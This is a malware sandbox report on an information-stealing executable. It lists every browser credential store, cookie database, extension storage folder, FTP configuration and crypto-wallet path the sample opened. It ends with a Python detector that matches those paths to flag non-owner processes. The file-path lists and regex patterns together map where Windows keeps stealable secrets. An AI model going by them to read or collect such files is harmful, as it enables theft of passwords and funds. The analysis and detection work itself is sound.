                Source: zLP3oiwG1g.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: zLP3oiwG1g.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: zLP3oiwG1g.exe String found in binary or memory: Wallets/Ethereum
                Source: zLP3oiwG1g.exe, 00000000.00000003.1445598270.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000036D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%ap
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe (all entries below)
Directory queried: C:\Users\user\Documents (18 times)
Directory queried: C:\Users\user\Documents\EFOYFBOLXA (4 times)
Directory queried: C:\Users\user\Documents\EIVQSAOTAQ (2 times)
Directory queried: C:\Users\user\Documents\GIGIYTFFYT (2 times)
Directory queried: C:\Users\user\Documents\PIVFAGEAAV (8 times)
Directory queried: C:\Users\user\Documents\SUAVTZKNFL (6 times)
Directory queried: number of queries: 1001
Source: Yara match; File source: Process Memory Space: zLP3oiwG1g.exe PID: 7300, type: MEMORYSTR
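The "File opened" entries above are the stealer's collection phase: one process that is neither a browser, an FTP client nor a wallet application reads Chrome/Edge Login Data, Web Data, Cookies and History, the Firefox key4.db/cert9.db pair, dozens of Chromium extension storage directories, FTP client configuration and a set of crypto-wallet directories, all within one run. The following detector is an added example, not part of the Joe Sandbox report, that turns this pattern into hunting logic over Sysmon-style file-access events. The path patterns are the ones the report lists; the event tuples, the process names treated as legitimate owners and the two-class threshold are assumptions made for this example.

```python
"""Added detection example, not part of the Joe Sandbox report.

Replays the report's "File opened" pattern against constructed Sysmon-style
file-access events: one process (here the sample itself) reading browser
credential stores, Firefox key material, browser extension storage, FTP client
configuration and crypto-wallet directories, none of which it owns. The
owning-process lists and the event tuples are assumptions made for this
example; the path fragments are the ones the report lists.
"""
import re
from collections import defaultdict

# Path patterns grouped by what the data gives an attacker.
TARGET_CLASSES = {
    "browser_credentials": [
        r"\\User Data\\[^\\]+\\Login Data( For Account)?$",
        r"\\User Data\\[^\\]+\\Web Data$",
        r"\\User Data\\[^\\]+\\Network\\Cookies$",
        r"\\User Data\\[^\\]+\\History$",
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(key4|cert9)\.db$",
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(cookies|formhistory)\.sqlite$",
    ],
    # Chromium extension IDs are 32 letters a-p; wallet extensions keep seeds here.
    "browser_extension_storage": [
        r"\\User Data\\[^\\]+\\(Local|Sync) Extension Settings\\[a-p]{32}$",
    ],
    "ftp_clients": [
        r"\\AppData\\Roaming\\(FTPInfo|FTPRush|FTPbox|FTPGetter)$",
        r"\\AppData\\Roaming\\SmartFTP\\",
        r"\\ProgramData\\SiteDesigner\\3D-FTP$",
    ],
    "crypto_wallets": [
        r"\\AppData\\Roaming\\Exodus\\exodus\.wallet$",
        r"\\AppData\\Roaming\\(Ledger Live|Binance|Guarda|atomic|com\.liberty\.jaxx)(\\|$)",
        r"\\AppData\\Roaming\\(Electrum|Electrum-LTC|Bitcoin)\\wallets$",
        r"\\AppData\\Local\\Coinomi\\Coinomi\\wallets$",
    ],
}
COMPILED = {c: [re.compile(p, re.IGNORECASE) for p in ps] for c, ps in TARGET_CLASSES.items()}

# Assumed legitimate owners (image file names, lower case); tune per estate.
OWNING_PROCESSES = {
    "browser_credentials": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "browser_extension_storage": {"chrome.exe", "msedge.exe"},
    "ftp_clients": {"ftprush.exe", "smartftp.exe", "ftpgetter.exe", "ftpbox.exe"},
    "crypto_wallets": {"exodus.exe", "electrum.exe", "electrum-ltc.exe", "bitcoin-qt.exe",
                       "coinomi.exe", "atomic.exe", "guarda.exe", "binance.exe"},
}


def classify(path):
    """Return the target class a file path belongs to, or None."""
    for cls, pats in COMPILED.items():
        if any(p.search(path) for p in pats):
            return cls
    return None


def analyze(events):
    """events: iterable of (image_path, target_path) tuples, e.g. from Sysmon
    file events. Returns {image: {class: set(paths)}} for non-owner accesses."""
    hits = defaultdict(lambda: defaultdict(set))
    for image, target in events:
        cls = classify(target)
        if cls is None:
            continue
        if image.rsplit("\\", 1)[-1].lower() in OWNING_PROCESSES[cls]:
            continue
        hits[image][cls].add(target)
    return hits


def verdict(hits, min_classes=2):
    """Flag processes that read from at least min_classes distinct target
    classes; a single class alone is often a backup or migration tool."""
    return {img: sorted(cls) for img, cls in hits.items() if len(cls) >= min_classes}


# Constructed events mirroring the report's "File opened" entries, plus two
# benign ones: the browser reading its own store and explorer opening a document.
SAMPLE = r"C:\Users\user\Desktop\zLP3oiwG1g.exe"
SAMPLE_EVENTS = [
    (SAMPLE, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (SAMPLE, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db"),
    (SAMPLE, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak"),
    (SAMPLE, r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    (SAMPLE, r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites"),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\Documents\report.docx"),
]

if __name__ == "__main__":
    for image, classes in verdict(analyze(SAMPLE_EVENTS)).items():
        print(f"STEALER-LIKE ACCESS: {image} read {', '.join(classes)}")
```

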